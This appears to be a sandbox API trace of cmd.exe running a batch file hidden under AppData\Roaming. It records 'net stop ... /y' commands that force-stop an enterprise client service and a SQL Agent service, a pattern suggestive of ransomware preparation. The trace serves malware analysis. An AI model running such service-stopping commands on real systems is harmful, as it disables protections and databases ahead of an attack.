_wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.464] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.464] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.464] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.464] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.464] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.465] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.465] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.465] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.465] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.465] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.465] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.465] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.465] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.465] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.465] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.465] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.465] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.465] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.465] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.465] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.465] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.465] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.465] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.465] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.465] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.465] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.465] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.465] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.465] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.465] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.465] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.465] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.465] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.465] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.465] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.465] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.465] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.465] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.466] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.466] SetErrorMode (uMode=0x0) returned 0x1 [0211.466] GetProcessHeap () returned 0x3e0000 [0211.466] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.466] GetProcessHeap () returned 0x3e0000 [0211.466] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.466] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.466] GetProcessHeap () returned 0x3e0000 [0211.466] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.466] GetProcessHeap () returned 0x3e0000 [0211.466] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.467] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.467] GetProcessHeap () returned 0x3e0000 [0211.467] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.467] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.467] GetProcessHeap () returned 0x3e0000 [0211.467] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.467] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.467] GetProcessHeap () returned 0x3e0000 [0211.467] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.468] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.468] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.468] GetLastError () returned 0x2 [0211.469] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.469] GetLastError () returned 0x2 [0211.469] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.469] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.470] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.470] GetLastError () returned 0x2 [0211.471] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.471] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.471] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.472] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.472] SetErrorMode (uMode=0x0) returned 0x1 [0211.472] GetProcessHeap () returned 0x3e0000 [0211.472] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.472] GetProcessHeap () returned 0x3e0000 [0211.472] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.472] GetProcessHeap () returned 0x3e0000 [0211.472] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0211.472] GetProcessHeap () returned 0x3e0000 [0211.472] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.473] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.473] GetProcessHeap () returned 0x3e0000 [0211.473] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.473] GetProcessHeap () returned 0x3e0000 [0211.473] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.473] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.473] GetProcessHeap () returned 0x3e0000 [0211.473] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.474] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.474] GetLastError () returned 0x2 [0211.474] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.474] GetLastError () returned 0x2 [0211.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0211.475] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.476] GetLastError () returned 0x2 [0211.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0211.476] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.477] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.477] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.477] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.477] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.478] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.478] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x7dc, dwThreadId=0x784)) returned 1 [0211.482] CloseHandle (hObject=0x74) returned 1 [0211.482] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.482] GetProcessHeap () returned 0x3e0000 [0211.482] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.482] GetEnvironmentStringsW () returned 0x3f8408* [0211.482] GetProcessHeap () returned 0x3e0000 [0211.482] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.482] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.482] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0211.625] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0211.625] CloseHandle (hObject=0x78) returned 1 [0211.625] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0211.625] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0211.625] GetProcessHeap () returned 0x3e0000 [0211.625] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.625] GetEnvironmentStringsW () returned 0x3f8408* [0211.625] GetProcessHeap () returned 0x3e0000 [0211.625] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.626] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.626] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.626] GetProcessHeap () returned 0x3e0000 [0211.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.626] GetEnvironmentStringsW () returned 0x3f8408* [0211.626] GetProcessHeap () returned 0x3e0000 [0211.626] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.626] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.626] GetProcessHeap () returned 0x3e0000 [0211.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0211.626] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.626] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.626] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.627] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.627] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.627] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.627] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.627] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.627] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.627] SetConsoleInputExeNameW () returned 0x1 [0211.627] GetConsoleOutputCP () returned 0x1b5 [0211.627] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0211.628] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0211.628] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.628] SetFilePointer (in: hFile=0x78, lDistanceToMove=4996, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1384 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.628] GetProcessHeap () returned 0x3e0000 [0211.628] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0211.629] GetProcessHeap () returned 0x3e0000 [0211.629] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.629] GetProcessHeap () returned 0x3e0000 [0211.629] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.629] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.629] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1384 [0211.629] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x53d, lpOverlapped=0x0) returned 1 [0211.629] SetFilePointer (in: hFile=0x78, lDistanceToMove=5032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13a8 [0211.629] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SBSMONITORING /y\r\neΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 36 [0211.629] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.629] GetFileType (hFile=0x78) returned 0x1 [0211.629] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.629] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13a8 [0211.629] GetProcessHeap () returned 0x3e0000 [0211.629] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.629] GetProcessHeap () returned 0x3e0000 [0211.630] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.633] _tell (_FileHandle=3) returned 5032 [0211.633] _close (_FileHandle=3) returned 0 [0211.633] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.633] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.633] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.633] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.633] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.633] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.633] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.633] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.633] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.633] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.633] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.633] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.633] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.633] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.633] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.633] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.633] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.633] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.633] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.634] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.634] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.634] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.634] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.634] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.634] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.634] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.634] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.634] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.634] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.634] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.634] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.634] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.634] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.634] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.634] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.634] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.634] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.634] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.634] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.634] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.634] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.634] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.634] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.635] SetErrorMode (uMode=0x0) returned 0x1 [0211.635] GetProcessHeap () returned 0x3e0000 [0211.635] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.635] GetProcessHeap () returned 0x3e0000 [0211.635] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.635] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.635] GetProcessHeap () returned 0x3e0000 [0211.635] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.635] GetProcessHeap () returned 0x3e0000 [0211.635] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.635] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.636] GetProcessHeap () returned 0x3e0000 [0211.636] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.636] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.636] GetProcessHeap () returned 0x3e0000 [0211.636] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.636] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.636] GetProcessHeap () returned 0x3e0000 [0211.636] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.636] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.637] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.637] GetLastError () returned 0x2 [0211.637] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.637] GetLastError () returned 0x2 [0211.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.638] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.638] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.639] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.639] GetLastError () returned 0x2 [0211.639] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.639] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.640] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.640] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.640] SetErrorMode (uMode=0x0) returned 0x1 [0211.640] GetProcessHeap () returned 0x3e0000 [0211.640] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.640] GetProcessHeap () returned 0x3e0000 [0211.640] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.641] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.641] GetProcessHeap () returned 0x3e0000 [0211.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 